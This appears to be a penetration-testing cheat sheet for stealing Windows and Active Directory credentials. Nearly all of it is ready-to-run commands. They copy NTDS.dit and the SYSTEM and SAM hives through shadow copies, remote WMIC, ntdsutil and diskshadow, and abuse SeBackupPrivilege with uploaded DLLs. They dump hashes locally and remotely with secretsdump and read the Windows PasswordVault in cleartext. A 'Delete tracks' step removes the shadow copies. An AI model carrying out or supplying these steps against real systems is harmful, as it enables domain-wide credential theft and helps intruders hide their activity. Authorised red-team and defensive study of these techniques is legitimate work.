These files are located at C:\Windows\System32\config\SAM and C:\Windows\System32\config\SYSTEM. You cannot simply copy them while Windows is running: the kernel keeps both hives open with an exclusive lock, so you need a volume shadow copy, a raw NTFS read (Invoke-NinjaCopy) or reg.exe save to obtain a copy.
Requires DC compromise (local admin / DA on a domain controller, or SeBackupPrivilege as shown in the diskshadow section).
We need 2 files:
NTDS.dit (default location C:\Windows\NTDS\NTDS.dit; the AD database holding the NT hashes)
SYSTEM registry hive (HKLM\SYSTEM, on disk at C:\Windows\System32\config\SYSTEM; holds the Boot Key)
The SYSTEM hive contains the Boot Key (syskey). It decrypts the Password Encryption Key (PEK) stored inside NTDS.dit, and the PEK in turn decrypts the hashes, so NTDS.dit alone is useless without the matching SYSTEM hive.
#Remotely with DA clear-text password (each command runs on the DC; check the log files for errors)
wmic /node:<DC_hostname> /user:<domain\user> /password:<pass> process call create "cmd /c vssadmin create shadow /for=C: > c:\vss.log 2>&1"
wmic /node:<DC_hostname> /user:<domain\user> /password:<pass> process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\windows\temp\NTDS.dit > c:\vss2.log 2>&1"
wmic /node:<DC_hostname> /user:<domain\user> /password:<pass> process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\windows\temp\SYSTEM.hive > c:\vss3.log 2>&1"
#HarddiskVolumeShadowCopy1 is only correct if no other shadow copies exist; read the "Shadow Copy Volume Name" from c:\vss.log (or vssadmin list shadows) and adjust the number.
#Remotely with DA Pass-the-ticket (a TGT for the DA account must already be injected into the current logon session, e.g. with mimikatz or Rubeus)
wmic /authority:"Kerberos:<domain\DC-hostname>" /node:<DC-Hostname> process call create "..<Same as above>.."
#Remotely via PSRemoting
PowerSploit's Invoke-NinjaCopy: reads the raw NTFS volume over a PSRemoting session, so it bypasses the exclusive lock on NTDS.dit and the hives without creating a shadow copy.
#NTDSUtil.exe. Must be run on the DC itself. Legitimate tool used by sysadmins, so it rarely gets flagged on its own.
Creating an "install from media" (IFM) set makes a copy of NTDS.dit and the SYSTEM registry hive (written to c:\temp\Active Directory\ntds.dit and c:\temp\registry\SYSTEM):
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
#Create a volume shadow copy (vssadmin create shadow only exists on Windows Server; on client SKUs use diskshadow, see below)
vssadmin create shadow /for=C:
#Retrieve Ntds.dit file from Volume Shadow Copy
#<Shadow directory> is the "Shadow Copy Volume Name" printed by vssadmin, e.g. \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1; NTDS.dit sits under \Windows\NTDS\ inside it
copy <Shadow directory>\Windows\NTDS\ntds.dit c:\Temp\ntds.dit
#Copy SYSTEM & SAM hive files from the live registry (reg.exe uses backup semantics, so the lock does not matter here)
reg.exe save HKLM\SAM sam.bak
reg.exe save HKLM\SYSTEM system.bak
#Delete tracks (the Shadow Copy ID is printed by vssadmin create shadow and by vssadmin list shadows)
vssadmin delete shadows /shadow={<Shadow Copy ID>}
#With DA privs, save NTDS.dit to C:\Temp
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
#Add -history for password history
secretsdump.py -sam SAM -system SYSTEM LOCAL
secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
#Remotely extract credentials (NTDS hashes are pulled over DRSUAPI replication, no shadow copy needed; SAM/LSA secrets via the remote registry)
sudo python3 secretsdump.py <domain>/<username>:'<pass>'@<IP>
#-just-dc-ntlm: only the NT hashes from NTDS, skip SAM/LSA secrets and Kerberos keys
impacket-secretsdump -just-dc-ntlm offense/administrator@10.0.0.6
#Create a script file called cmd in C:\windows\temp\ (diskshadow writes scratch files to the current directory, so run it from a writable directory such as C:\windows\temp\)
#cmd contents (one command per line, CRLF line endings):
set context persistent nowriters
add volume c: alias temp
create
expose %temp% h:
exit
#Create a shadow volume of C: accessible via the H: drive
diskshadow /s cmd
# upload SeBackupPrivilegeUtils.dll and SeBackupPrivilegeCmdLets.dll
#https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug
import-module .\SeBackupPrivilegeUtils.dll
import-module .\SeBackupPrivilegeCmdLets.dll
Copy-FileSeBackupPrivilege h:\windows\ntds\ntds.dit c:\windows\temp\NTDS -Overwrite
Copy-FileSeBackupPrivilege h:\windows\system32\config\SYSTEM c:\windows\temp\SYSTEM -Overwrite
SeBackupPrivilege (held by Backup Operators) lets a process open any file with backup semantics, which bypasses the NTFS ACL on c:\windows\ntds; it does not bypass the exclusive lock, which is why the copy is taken from the shadow volume on H: rather than from C:. Refer to the ACL Abuse section for more details.
#Load the Credentials and PasswordVault assemblies:
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
#Instantiate an object of the PasswordVault class to work with:
$vault = New-Object Windows.Security.Credentials.PasswordVault
#Read contents of the vault
$vault.RetrieveAll() | % { $_.RetrievePassword();$_ }